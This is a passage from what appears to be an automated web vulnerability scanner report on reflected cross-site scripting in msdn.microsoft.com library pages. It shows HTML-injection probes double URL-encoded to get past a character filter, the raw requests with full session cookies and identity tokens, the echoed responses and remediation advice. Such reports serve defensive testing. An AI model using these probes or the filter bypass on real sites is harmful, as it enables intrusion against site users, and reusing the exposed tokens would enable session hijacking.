MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library98201"><a>9d927c0b48e/bb726434(office.12)" />
...[SNIP]...

2.30. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb726434(office.12).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae2f%2522%253e%253ca%253e4fee7d32026 was submitted in the REST URL parameter 3. This input was echoed as dae2f"><a>4fee7d32026 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb726434(office.12).aspxdae2f%2522%253e%253ca%253e4fee7d32026 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9231
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb726434(office.12).aspxdae2f"><a>4fee7d32026" />
...[SNIP]...

2.31. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16d6%2522%253e%253ca%253edf793d40793 was submitted in the REST URL parameter 1. This input was echoed as f16d6"><a>df793d40793 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usf16d6%2522%253e%253ca%253edf793d40793/library/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf16d6"><a>df793d40793/library/bb871518" />
...[SNIP]...

2.32. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8490f%2522%253e%253ca%253e2ba8dfb9f97 was submitted in the REST URL parameter 2. This input was echoed as 8490f"><a>2ba8dfb9f97 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library8490f%2522%253e%253ca%253e2ba8dfb9f97/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8490f"><a>2ba8dfb9f97/bb871518" />
...[SNIP]...

2.33. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871518.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69909%2522%253e%253ca%253e23caee0588 was submitted in the REST URL parameter 3. This input was echoed as 69909"><a>23caee0588 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/bb871518.aspx69909%2522%253e%253ca%253e23caee0588 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871518.aspx69909"><a>23caee0588" />
...[SNIP]...

2.34. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b435%2522%253e%253ca%253e05423347fd7 was submitted in the REST URL parameter 1. This input was echoed as 8b435"><a>05423347fd7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us8b435%2522%253e%253ca%253e05423347fd7/library/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8b435"><a>05423347fd7/library/bb871519" />
...[SNIP]...

2.35. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/bb871519.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98e4%2522%253e%253ca%253eb5a34807f69 was submitted in the REST URL parameter 2. This input was echoed as f98e4"><a>b5a34807f69 in the application's response.

